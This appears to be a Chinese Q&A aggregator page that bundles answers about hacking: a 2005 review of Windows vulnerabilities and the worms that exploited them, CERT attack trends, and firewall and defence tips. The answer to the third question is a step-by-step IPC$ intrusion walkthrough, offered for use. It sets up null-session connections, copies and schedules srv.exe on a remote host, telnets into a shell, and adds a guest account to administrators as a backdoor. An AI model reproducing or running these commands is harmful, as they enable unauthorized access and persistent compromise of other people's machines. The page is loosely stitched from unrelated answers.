本文目录一览：

• 1、黑客是怎么通过代码来攻击游览者的
• 2、即插即用中的漏洞的编号是多少
• 3、跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有
• 4、黑客到底是怎么利用漏洞攻击我们电脑的
• 5、请问黑客是如何侵入有漏洞的电脑的？
• 6、电脑如果遭遇黑客攻击怎么办？

黑客是怎么通过代码来攻击游览者的

首先浏览者的电脑必须有漏洞，如果打上系统补丁那就没辙了，这段代码主要是利用特定的漏洞来让浏览器在后台下载并运行指定文件，含有这样代码的网页被称为网页木马，简称网马，很多被挂了网马的网站只是被插入了一段弹出网页代码，这段代码会让浏览器弹出一个长宽为0的页面，实际上就是一个看不见的页面，而这个页面实际上就是我上面说说的网马页面，不过只要你打上全系统补丁就可以不必在乎网马。我们常见的视频木马也是这个道理。

即插即用中的漏洞的编号是多少

众所周知，每次微软的系统漏洞被发现后，针对该漏洞的恶意代码很快就会出现在网上，一系列案例证明，从漏洞被发现到恶意代码出现，中间的时差开始变得越来越短。更为严重的是，从去年至今，微软操作系统接连出现了数个0day漏洞。去年12月底， WMF(图元文件)的0day漏洞被公布，微软不得不为此打破其每月第二周发布补丁的惯例，于2006年1月6日提前发布了该漏洞补丁。操作系统漏洞对于网络安全的威胁日益严重，为了提醒电脑用户及时关注并升级微软操作系统漏洞补丁，避免因此遭受病毒侵害，1月23日，权威反病毒厂商江民科技对2005年微软操作系统漏洞进行了回顾，总结发布了微软2005年度十大漏洞。十大漏洞中，已知有五大漏洞(MS05-039、MS05-053、MS05-051、MS05-009、ACCESS JET最新漏洞)已经被病毒利用，并造成不同程度的危害，而至今尚有两大漏洞(Msdds.dll模块和javaprxy.dll模块漏洞)并无补丁发布。

一、MS05-039: 即插即用功能存在远程代码执行和权限提升漏洞

美国当地时间8月9日，微软发布了6个最新的安全更新程序。其中，MS05-039: 即插即用功能存在远程代码执行和权限提升漏洞，该漏洞在公布后一周之内就被黑客利用。8月12日，江民公司反病毒中心发布病毒预警，继微软8月9日发布了6个安全漏洞补丁之后，国内外黑客纷纷公布利用这些最新漏洞的攻击程序，利用Windows即插即用远程代码执行漏洞(MS05-039)的程序潜在威胁更大，如果成功利用该漏洞，甚至可能出现具有像冲击波和震荡波病毒一样的传播能力的恶意蠕虫。

据江民反病毒专家分析，8月11日发布的攻击代码中，利用Windows即插即用远程代码执行漏洞(MS05-039)的程序潜在威胁更大，而成功利用该漏洞的蠕虫很可能具有像冲击波和震荡波病毒一样的传播能力。专家表示，目前被公布的代码针对Windows 2000系统，但此漏洞同样存在于除Windows 98和Windows ME以外的几乎所有主流Windows操作系统中。2005年8月15日，江民反病毒中心截获一个利用微软"即插即用服务代码执行漏洞"(MS05-039)的蠕虫“极速波”病毒I-Worm/Zobot。该病毒利用最新漏洞传播，并且可以通过IRC接受黑客命令，使被感染计算机被黑客完全控制。“极速波”造成数万人的机器被感染，电脑频繁重启或死机，一切与“冲击波”、“震荡波”病毒并无二样，不同的是由于这次反病毒厂商预警及时，没有发生类似“冲击波”那样大规模的疫情爆发。

二、MS05-053:图形呈现引擎中的漏洞可能允许执行代码

美国当地时间11月8日，微软发布了本月唯一最高严重等级安全公告MS05-053。公告称其图形呈现引擎中存在漏洞，可能允许远程执行代码 (896424)。目前受影响的操作系统包括WINDOWS2000以上的所有操作系统，最新的64位版本操作系统也未能幸免。

江民反病毒专家指出，微软“图形呈现引擎”也即“图形渲染引擎”( Graphics rendering engine )，电脑用户在操作过程中，屏幕中呈现的窗口、界面、按钮等许多都是图形渲染引擎自动生成的，黑客可以利用程序执行过程中的漏洞，欺骗用户在网站或HTML电子邮件中观看恶意图像，从而在用户毫不知觉的情况下种植木马病毒或后门程序，对染毒电脑进行远程操控。

无独有偶，去年九月，微软曾发布过类似的安全警告MS04-028，JPEG格式图片在执行过程中也会出现类似漏洞，公告发布后不久，针对JPEG远程执行漏洞的木马病毒就出现在网上。11月30日，江民反病毒研究中心监测到，针对11月8日微软发布的本月唯一最高严重等级漏洞，网上已有攻击代码出现，经过验证，该段代码可以导致电脑失去响应，但尚不能实现对计算机进行远程控制，反病毒专家担心，一旦危害更大的用来远程控制用户系统的攻击代码出现，一场大规模的网络攻击可能会发生。据江民反病毒专家介绍，该段代码可以生成一个恶意的.wmf文件(微软图元文件)，浏览该文件可以造成CPU占用100%。江民反病毒专家此前曾指出，微软“图形呈现引擎”也即“图形渲染引擎”( Graphics rendering engine )，电脑用户在操作过程中，屏幕中呈现的窗口、界面、按钮等许多都是图形渲染引擎自动生成的，黑客可以利用程序执行过程中的漏洞，欺骗用户在网站或HTML电子邮件中观看恶意图像，从而在用户毫不知觉的情况下种植木马病毒或后门程序，对染毒电脑进行远程操控。

微软发布关于该漏洞的安全公告的当日，江民反病毒专家就预言针对‘图形呈现引擎’漏洞的攻击程序会很快出现，并且极易引发病毒攻击，现在攻击代码的出现加重了反病毒专家的担扰。

三、MS05-051：MSDTC 和 COM+ 中的漏洞可能允许远程执行代码

10月11日，微软安全中心发布了2005年10月漏洞安全公告，例行发布了9个安全更新，9个安全漏洞分别为MS05-044至MS05-052，其中MS05-050、MS05-051和MS05-052的危险等级为严重。江民反病毒专家当时提醒用户，针对该漏洞的恶意代码很快就会出现在网上。三个严重等级漏洞中，MS05-051系MSDTC 和 COM+ 中的漏洞可能允许远程执行代码漏洞，最有可能被黑客利用，黑客成功利用此漏洞可以完全控制受影响的系统，攻击者可随后安装程序，查看、更改或删除数据，或者创建拥有完全用户权限的新帐户。该漏洞在12月18日被病毒利用，当日，江民反病毒研究中心监测到，一种通过微软10月份发布的严重级漏洞MS05-051传播的蠕虫病毒“黛蛇”(I-Worm/Dasher.B)出现在网上。该病毒通过攻击TCP1025端口获得远程执行命令的权限，还针对微软MS04-045、MS04-039漏洞或利用SQL溢出工具进行攻击。蠕虫感染成功后将安装键盘记录程序，对用户所有的击键动作进行记录，从而窃取电脑用户的密码口令等机密信息。江民反病毒专家建议立即升级漏洞补丁，升级杀毒软件并开启病毒实时监控。

四、微软ACCESS JET最新漏洞

2005年4月份，某国外安全厂商发布ACCESS JET最新漏洞，报道称，办公软件在分析数据库文件时存储部分出现漏洞，10月份，针对该漏洞的木马在网上出现，安全公司称，用户在微软Access环境下打开受病毒感染的.mdb文件时，木马便被激活，该木马以微软数据文件的格式出现，可利用微软Jet数据库引擎的缓冲区溢出漏洞侵入，非法用户可借助该病毒登录系统，进行文件上传、修改注册表并获取系统和网络信息。

10月5日，微软表示，将对该木马病毒展开调查，此前有安全专家警告称，一种新的木马病毒正在攻击微软办公软件。微软发言人周一在回复邮件中称，公司已提醒用户提高警惕，在打开不明来源的.mdb文件时要特别小心，该发言人称，目前还没有针对该漏洞的补丁推出。

2005年10月7日，江民反病毒研究中心发布针对该漏洞的病毒预警，江民反病毒专家提醒，由于该病毒主要攻击微软ACCESS漏洞，因此安装ACCESS数据库的小企业用户可能会成为病毒首先攻击的目标。

五、MS05-009 Windows媒体播放器和MSN处理PNG图片存在代码执行漏洞

2005年2月8日，微软安全中心发布了2月漏洞安全公告：MS05-009危害等级为“严重”，利用该漏洞，黑客可以完全控制用户计算机，以当前用户权限进行任何操作。该漏洞于5月份被病毒“MSN鬼脸”( Exploit.MSN.Atmaca)利用， “MSN鬼脸”利用微软漏洞(MS05-009)即MSN Messenger在处理PNG图片时存在缓冲区溢出的漏洞，制造出PNG格式的病毒图片。黑客可以通过将该病毒图片放入自定义头像中使与其聊天的用户被病毒感染。被感染的用户会自动连接某个带有恶意程序的网站,并将恶意程序下载到本地执行。

六、Msdds.dll模块导致远程代码执行的严重漏洞

8月17日，继微软最新即插即用服务严重漏洞(MS05-039))被“极速波”病毒利用后，江民公司反病毒中心再次监测到，微软IE浏览器的又一个最新远程代码执行漏洞被公布在互联网上，目前微软尚未发布任何补丁程序，潜在危害十分巨大。

该漏洞存在于Msdds.dll模块中，是可以导致远程代码执行的严重漏洞。如何利用漏洞的示范代码已经被直接发布，该段代码能够生成恶意网页，用户在使用IE浏览器访问页面时，就会在本地计算机上打开后门端口，可以被黑客完全控制。

据江民反病毒专家介绍，Msdds.dll远程代码执行漏洞是一个“0-day”漏洞，即有关漏洞的一切描述都没有被报导过，而现在竟直接发现了利用漏洞的恶意代码，且目前还尚无任何补丁可以修复它，隐患巨大。

七、javaprxy.dll模块漏洞可在网页内嵌任意病毒代码

7月4日，国内最大的计算机反病毒软件厂商江民科技反病毒中心监测到，微软IE浏览器的一个最新漏洞已被公布到互联网上，而利用此漏洞的恶意代码源程序也同时被发布。此漏洞影响IE5.01版到6.0版几乎所有IE浏览器，即使是打过最新补丁的Windows XP SP2也未能幸免，目前尚无针对此漏洞的安全补丁。

江民反病毒专家介绍，该漏洞存在于javaprxy.dll模块中，利用该漏洞，可以制作内嵌任意病毒代码的恶意网页，当用户使用IE浏览器打开恶意页面时，就会自动执行病毒程序。

病毒程序执行后，会在本机打开后门端口，黑客通过这一端口，能够完全控制用户计算机。而且只需将程序代码稍加改动，黑客有可能制作出危害更大的网页出来。

目前，江民公司反病毒专家正在密切关注事态发展，研究相应的安全对策，并会于第一时间向用户提供。电脑用户只需运行江民杀毒软件KV2006未知病毒主动防御系统，开启“木马/注册表监控”，即可有效防范利用此漏洞的恶意代码于系统之外。

八、MS05-016: Windows Shell中漏洞允许远程执行代码

2005年4月12日，微软发布了8个安全更新程序MS05-016~023， 5个为严重级,3个为重要级，修复了包括Word,MSN,IE在内的Windows产品存在的漏洞。其中，MS05-016较为重要，如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。 攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

九、MS05-026:HTML帮助中的漏洞可能允许远程执行代码

2005年06月14日，微软发布了6月份安全更新MS05--025 ~027，三个漏洞等级都为严重，其中 HTML帮助中的漏洞可能允许远程执行代码受到江民反病毒专家关注，专家提醒用户紧急更新系统，以防遭受病毒攻击。

十、 MS05-018:Windows内核存在允许特权提升和DoS漏洞

2005年4月12日，微软发布了4月份例行更新，公布了MS05-018安全公告，黑客成功利用此漏洞，最严重的情况是攻击者可以完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

黑客到底是怎么利用漏洞攻击我们电脑的

编写的计算机程序都或多或少有考虑不周全的地方，这个不周全就称为漏洞，只不过这个漏洞可能会带来不同的后果，普通的可以危害很小，甚至没有严重影响，但是级别高的漏洞就有很大的危害，例如可以让机器死机、可以让攻击者控制机器等。

举例：针对接收数据缓冲区设计的溢出攻击代码，含有漏洞的机器一旦接到精心构筑的超长数据，除了缓冲区被填充以外，剩余代码就会被填充到了缓冲区外的其他内存地址，一旦进入了没有被保护的数据执行区域，就会被加载执行，此类攻击代码被精心设计过，令执行代码长度刚好落入执行区域，否则攻击就会失败。打过补丁的机器就会对缓冲区重新构筑，超长代码会被拦截丢弃处理，就不会被攻击了。

请问黑客是如何侵入有漏洞的电脑的？

从1988年开始，位于美国卡内基梅隆大学的CERT CC(计算机紧急响应小组协调中心)就开始调查入侵者的活动。CERT CC给出一些关于最新入侵者攻击方式的趋势。

趋势一：攻击过程的自动化与攻击工具的快速更新

攻击工具的自动化程度继续不断增强。自动化攻击涉及到的四个阶段都发生了变化。

1.扫描潜在的受害者。从1997年起开始出现大量的扫描活动。目前，新的扫描工具利用更先进的扫描技术，变得更加有威力，并且提高了速度。

2.入侵具有漏洞的系统。以前，对具有漏洞的系统的攻击是发生在大范围的扫描之后的。现在，攻击工具已经将对漏洞的入侵设计成为扫描活动的一部分，这样大大加快了入侵的速度。

3.攻击扩散。2000年之前，攻击工具需要一个人来发起其余的攻击过程。现在，攻击工具能够自动发起新的攻击过程。例如红色代码和Nimda病毒这些工具就在18个小时之内传遍了全球。

4.攻击工具的协同管理。自从1999年起，随着分布式攻击工具的产生，攻击者能够对大量分布在Internet之上的攻击工具发起攻击。现在，攻击者能够更加有效地发起一个分布式拒绝服务攻击。协同功能利用了大量大众化的协议如IRC(Internet Relay Chat)、IR(Instant Message)等的功能。

趋势二：攻击工具的不断复杂化

攻击工具的编写者采用了比以前更加先进的技术。攻击工具的特征码越来越难以通过分析来发现，并且越来越难以通过基于特征码的检测系统发现，例如防病毒软件和入侵检测系统。当今攻击工具的三个重要特点是反检测功能，动态行为特点以及攻击工具的模块化。

1.反检测。攻击者采用了能够隐藏攻击工具的技术。这使得安全专家想要通过各种分析方法来判断新的攻击的过程变得更加困难和耗时。

2.动态行为。以前的攻击工具按照预定的单一步骤发起进攻。现在的自动攻击工具能够按照不同的方法更改它们的特征，如随机选择、预定的决策路径或者通过入侵者直接的控制。

3.攻击工具的模块化。和以前攻击工具仅仅实现一种攻击相比，新的攻击工具能够通过升级或者对部分模块的替换完成快速更改。而且，攻击工具能够在越来越多的平台上运行。例如，许多攻击工具采用了标准的协议如IRC和HTTP进行数据和命令的传输，这样，想要从正常的网络流量中分析出攻击特征就更加困难了。

趋势三：漏洞发现得更快

每一年报告给CERT/CC的漏洞数量都成倍增长。CERT/CC公布的漏洞数据2000年为1090个，2001年为2437个，2002年已经增加至4129个，就是说每天都有十几个新的漏洞被发现。可以想象，对于管理员来说想要跟上补丁的步伐是很困难的。而且，入侵者往往能够在软件厂商修补这些漏洞之前首先发现这些漏洞。随着发现漏洞的工具的自动化趋势，留给用户打补丁的时间越来越短。尤其是缓冲区溢出类型的漏洞，其危害性非常大而又无处不在，是计算机安全的最大的威胁。在CERT和其它国际性网络安全机构的调查中，这种类型的漏洞是对服务器造成后果最严重的。

趋势四：渗透防火墙

我们常常依赖防火墙提供一个安全的主要边界保护。但是情况是：

* 已经存在一些绕过典型防火墙配置的技术，如IPP(the Internet Printing Protocol)和WebDAV(Web-based Distributed Authoring and Versioning)

* 一些标榜是“防火墙适用”的协议实际上设计为能够绕过典型防火墙的配置。

特定特征的“移动代码”(如ActiveX控件，Java和JavaScript)使得保护存在漏洞的系统以及发现恶意的软件更加困难。

另外，随着Internet网络上计算机的不断增长，所有计算机之间存在很强的依存性。一旦某些计算机遭到了入侵，它就有可能成为入侵者的栖息地和跳板，作为进一步攻击的工具。对于网络基础架构如DNS系统、路由器的攻击也越来越成为严重的安全威胁。

采用主动防御措施应对新一代网络攻击

“红色代码”蠕虫病毒在因特网上传播的最初九小时内就感染了超过250，000个计算机系统。该感染导致的代价以每天2亿美元飞速增长，最终损失高达26亿美元。“红色代码”，“红色代码II”，及“尼姆达”、“求职信”快速传播的威胁显示出现有的网络防御的严重的局限性。市场上大多数的入侵检测系统是简单的，对网络中新出现的、未知的、通常称做“瞬时攻击：Zero-day Attack”的威胁没有足够防御手段。

黑客的“机会之窗”

目前大多数的入侵检测系统是有局限性的，因为它们使用特征码去进行辨别是否存在攻击行为。这些系统采用这种方式对特定的攻击模式进行监视。它们基于贮存在其数据库里的识别信息：类似于防病毒软件检查已知病毒的方式。这意味着这些系统只能检测他们已经编入识别程序的特定的攻击。因为“瞬时攻击”是新出现的，尚未被广泛认识，所以在新的特征码被开发出来，并且进行安装和配置等这些过程之前，它们就能绕过这些安全系统。实际上，仅仅需要对已知的攻击方式进行稍微的修改，这些系统就不会认识这些攻击方式了，从而给入侵者提供了避开基于特征码的防御系统的手段。

从新的攻击的发动到开发新的特征码的这段时间，是一个危险的“机会之窗”，许多的网络会被攻破。这时候许多快速的入侵工具会被设计开发出来，网络很容易受到攻击。下图举例说明了为什么大多数的安全产品在该时期内实际上是无效的。CERT组织研制的这个图表说明了一个网络攻击的典型的生命周期。该曲线的波峰就在攻击的首次袭击之后，这是大多数安全产品最终开始提供保护的时候。然而“瞬时攻击”是那些最老练的黑客在最早期阶段重点展开的。

同时，现在那些快速进行的攻击利用了广泛使用的计算机软件中的安全漏洞来造成分布更广的破坏。仅仅使用几行代码，他们就能编写一个蠕虫渗透到计算机网络中，通过共享账号克隆自己，然后开始攻击你的同伴和用户的网络。使用这种方式，在厂商开发出特征码并将其分发到用户的这段时间内，“尼姆达蠕虫”仅仅在美国就传播到了超过100,000的网络站点。这些分发机制使“瞬间攻击”像SirCam和Love Bug两种病毒分别席卷了230万和4000万的计算机，而不需要多少人为干预。其中有些攻击甚至还通过安装一个后门来为以后的破坏建立基础，该后门允许对手、黑客和其他未获授权的用户访问一个组织重要的数据和网络资源。

电脑如果遭遇黑客攻击怎么办？

一旦找到了服务器存在的问题，那么后果将是严重的。这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描，本节我将谈谈如何才能让自己的服务器免遭黑客扫描。

一、防范黑客心得体会：

1、屏蔽可以IP地址：

这种方式见效最快，一旦网络管理员发现了可疑的IP地址申请，可以通过防火墙屏蔽相对应的IP地址，这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点，例如很多黑客都使用的动态IP，也就是说他们的IP地址会变化，一个地址被屏蔽，只要更换其他IP仍然可以进攻服务器，而且高级黑客有可能会伪造IP地址，屏蔽的也许是正常用户的地址。

2、过滤信息包：

通过编写防火墙规则，可以让系统知道什么样的信息包可以进入、什么样的应该放弃，如此一来，当黑客发送有攻击性信息包的时候，在经过防火墙时，信息就会被丢弃掉，从而防止了黑客的进攻。但是这种做法仍然有它不足的地方，例如黑客可以改变攻击性代码的形态，让防火墙分辨不出信息包的真假；或者黑客干脆无休止的、大量的发送信息包，知道服务器不堪重负而造成系统崩溃。

3、修改系统协议：

对于漏洞扫描，系统管理员可以修改服务器的相应协议，例如漏洞扫描是根据对文件的申请返回值对文件存在进行判断的，这个数值如果是200则表示文件存在于服务器上，如果是404则表明服务器没有找到相应的文件，但是管理员如果修改了返回数值、或者屏蔽404数值，那么漏洞扫描器就毫无用处了。

4、经常升级系统版本：

任何一个版本的系统发布之后，在短时间内都不会受到攻击，一旦其中的问题暴露出来，黑客就会蜂拥而致。因此管理员在维护系统的时候，可以经常浏览著名的安全站点，找到系统的新版本或者补丁程序进行安装，这样就可以保证系统中的漏洞在没有被黑客发现之前，就已经修补上了，从而保证了服务器的安全。

5、及时备份重要数据：

亡羊补牢，如果数据备份及时，即便系统遭到黑客进攻，也可以在短时间内修复，挽回不必要的经济损失。想国外很多商务网站，都会在每天晚上对系统数据进行备份，在第二天清晨，无论系统是否收到攻击，都会重新恢复数据，保证每天系统中的数据库都不会出现损坏。数据的备份最好放在其他电脑或者驱动器上，这样黑客进入服务器之后，破坏的数据只是一部分，因为无法找到数据的备份，对于服务器的损失也不会太严重。

然而一旦受到黑客攻击，管理员不要只设法恢复损坏的数据，还要及时分析黑客的来源和攻击方法，尽快修补被黑客利用的漏洞，然后检查系统中是否被黑客安装了木马、蠕虫或者被黑客开放了某些管理员账号，尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净，防止黑客的下一次攻击。

6、使用加密机制传输数据：

对于个人信用卡、密码等重要数据，在客户端与服务器之间的传送，应该仙经过加密处理在进行发送，这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制，都已经出现了不同的破解方法，因此在加密的选择上应该寻找破解困难的，例如DES加密方法，这是一套没有逆向破解的加密算法，因此黑客的到了这种加密处理后的文件时，只能采取暴力破解法。个人用户只要选择了一个优秀的密码，那么黑客的破解工作将会在无休止的尝试后终止。

二、防火墙使用说明：

1．什么是防火墙？

防火墙的英文叫做firewall，它能够在网络与电脑之间建立一道监控屏障，保护在防火墙内部的系统不受网络黑客的攻击。逻辑上讲，防火墙既是信息分离器、限制器，也是信息分析器，它可以有效地对局域网和Internet之间的任何活动进行监控，从而保证局域网内部的安全。

网络上最著名的软件防火墙是LockDown2000，这套软件需要经过注册才能获得完整版本，它的功能强大，小到保护个人上网用户、大到维护商务网站的运作，它都能出色的做出惊人的表现。但因为软件的注册需要一定费用，所以对个人用户来说还是选择一款免费的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了，天网防火墙个人版是一套给个人电脑使用的网络安全程序，它能够抵挡网络入侵和攻击，防止信息泄露。

2、天网防火墙的基本功能：

天网防火墙个人版把网络分为本地网和互联网，可以针对来自不同网络的信息，来设置不同的安全方案，以下所述的问题都是针对互联网而言的，故所有的设置都是在互联网安全级别中完成的。 怎样防止信息泄露？ 如果把文件共享向互联网开放，而且又不设定密码，那么别人就可以轻松的通过互联网看到您机器中的文件，如果您还允许共享可写，那别人甚至可以删除文件。 你可以在个人防火墙的互联网安全级别设置中，将NETBIOS 关闭，这样别人就不能通过INTERNET访问你的共享资源了（这种设置不会影响你在局域网中的资源共享）。

当拨号用户上网获得了分配到的IP地址之后，可以通过天网防火墙将ICMP关闭，这样黑客用PING的方法就无法确定使用者的的系统是否处于上网状态，无法直接通过IP地址获得使用者系统的信息了。

需要指出的是：防火墙拦截的信息并不完全是攻击信息，它记录的只是系统在安全设置中所拒绝接收的数据包。在某些情况下，系统可能会收到一些正常但又被拦截的数据包，例如某些路由器会定时发出一些IGMP包等；或有些主机会定时PING出数据到本地系统确认连接仍在维持着，这个时候如果利用防火墙将ICMP和IGMP屏蔽了，就会在安全记录中见到这些被拦截的数据包，因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。

3、使用防火墙的益处：

使用防火墙可以保护脆弱的服务，通过过滤不安全的服务，Firewall可以极大地提高网络安全和减少子网中主机的风险。例如，Firewall可以禁止NIS、NFS服务通过，同时可以拒绝源路由和ICMP重定向封包。

另外防火墙可以控制对系统的访问权限，例如某些企业允许从外部访问企业内部的某些系统，而禁止访问另外的系统，通过防火墙对这些允许共享的系统进行设置，还可以设定内部的系统只访问外部特定的Mail Server和Web Server，保护企业内部信息的安全。

4、防火墙的种类：

防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型：

（1）数据包过滤

数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择，选择的依据是系统内设置的过滤逻辑，被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地址、目的地址、所用的端口号、协议状态等因素，或它们的组合来确定是否允许该数据包通过。 数据包过滤防火墙逻辑简单，价格便宜，易于安装和使用，网络性能和透明性好，它通常安装在路由器上。路由器是内部网络与Internet连接必不可少的设备，因此在原有网络上增加这样的防火墙几乎不需要任何额外的费用。

数据包过滤防火墙的缺点有二：一是非法访问一旦突破防火墙，即可对主机上的软件和配置漏洞进行攻击；二是数据包的源地址、目的地址以及IP的端口号都在数据包的头部，很有可能被窃听或假冒。

（2）应用级网关

应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针对特定的网络应用服务协议使用指定的数据过滤逻辑，并在过滤的同时，对数据包进行必要的分析、登记和统计，形成报告。实际中的应用网关通常安装在专用工作站系统上。

数据包过滤和应用网关防火墙有一个共同的特点，就是它们仅仅依靠特定的逻辑判定是否允许数据包通过。一旦满足逻辑，则防火墙内外的计算机系统建立直接联系，防火墙外部的用户便有可能直接了解防火墙内部的网络结构和运行状态，这有利于实施非法访问和攻击。

（3）代理服务

代理服务(Proxy Service)也称链路级网关或TCP通道(Circuit Level Gateways or TCP Tunnels)，也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺点而引入的防火墙技术，其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外计算机系统间应用层的" 链接"，由两个终止代理服务器上的" 链接"来实现，外部计算机的网络链路只能到达代理服务器，从而起到了隔离防火墙内外计算机系统的作用。此外，代理服务也对过往的数据包进行分析、注册登记，形成报告，同时当发现被攻击迹象时会向网络管理员发出警报，并保留攻击痕迹。